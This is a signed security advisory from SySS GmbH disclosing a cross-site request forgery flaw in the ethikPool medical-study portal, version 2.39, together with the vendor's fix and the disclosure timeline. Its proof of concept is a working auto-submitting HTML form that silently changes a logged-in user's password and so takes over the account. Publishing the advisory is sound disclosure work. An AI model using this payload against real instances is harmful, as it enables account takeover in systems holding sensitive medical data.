-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-056 
Product:                   ethikPool
Manufacturer:              uhb Software GmbH
Affected Version(s):       2.39
Tested Version(s):         2.39
Vulnerability Type:        Cross-Site Request Forgery (CWE-352) 
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2025-09-16
Solution Date:             2026-03-05
Public Disclosure:         2026-04-09
CVE Reference:             Not yet assigned
Author of Advisory:        Dennis Caliskan, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ethikPool is a portal for the administration of medical studies.

The manufacturer describes the product as follows (see [1]):

"Our portal for ethics committee submissions: From application to
approval, this web-based module supports and documents all procedures."

Due to the absence of anti-CSRF tokens and improperly configured cookie
attributes, the web application is vulnerable to cross-site request
forgery (CSRF) attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web application does not make use of anti-CSRF tokens and sets
cookie attributes incorrectly. Therefore, the web application is
vulnerable to CSRF attacks. By luring a user to a maliciously crafted
page, an attacker can trigger a background request to the web server,
resulting in the execution of a vulnerable action within the context of
the authenticated user's session. Since it is possible to change an
account's password without providing the current password, the CSRF
vulnerability allows for full account takeover.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Host the following HTML document on a separate web server. Insert an
   arbitrary password fulfilling the web application's password policy.

<html>
  <body>
    <form action="https://<instance_of_ethikpool>/users/password/sc" method="POST">
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="data&#91;User&#93;&#91;newpassword&#93;" value="<INSERT_PASSWORD_HERE>" />
      <input type="hidden" name="data&#91;User&#93;&#91;newpassword2&#93;" value="<INSERT_PASSWORD_HERE>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

2. Authenticate in ethikPool.

3. Visit the web server hosting the malicious HTML document in the same
   browser used for authenticating in ethikPool.

4. Observe that by visiting the web server, the password for your account
   has been changed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The patch released by the manufacturer implements an anti-CSRF token for
the respective transactional request. Moreover, the SameSite attribute
of the session cookie was set properly. This restricts cross-site cookie
transmission and helps ensure that sensitive requests are only made
from trusted origins.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-09-10: Vulnerability discovered
2025-09-16: Vulnerability reported to manufacturer
2025-09-30/2026-03-04: Consultation and cooperation with the manufacturer
2026-03-05: Fix of vulnerability with patch released
2026-04-09: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for ethikPool
    https://uhb-software.com/smart-q-produkte/
[2] SySS Security Advisory SYSS-2025-056
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-056.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dennis Caliskan of SySS GmbH.

E-Mail: dennis.caliskan@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Dennis_Caliskan.asc
Key ID: 0x5E916BF585867B55
Key Fingerprint: 52ED 2BF9 15D9 4965 854A 8336 5E91 6BF5 8586 7B55

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQRS7Sv5FdlJZYVKgzZekWv1hYZ7VQUCadi9vAAKCRBekWv1hYZ7
VWpIAQCb8nelSC4fyOxk3ca0bTa76Kvc6oNq2XNptHJmhzJr5wD6A3f9dwaGNTO3
hLlC6r5T8gG100o5hkfMYwLnFrIWSAk=
=ojb2
-----END PGP SIGNATURE-----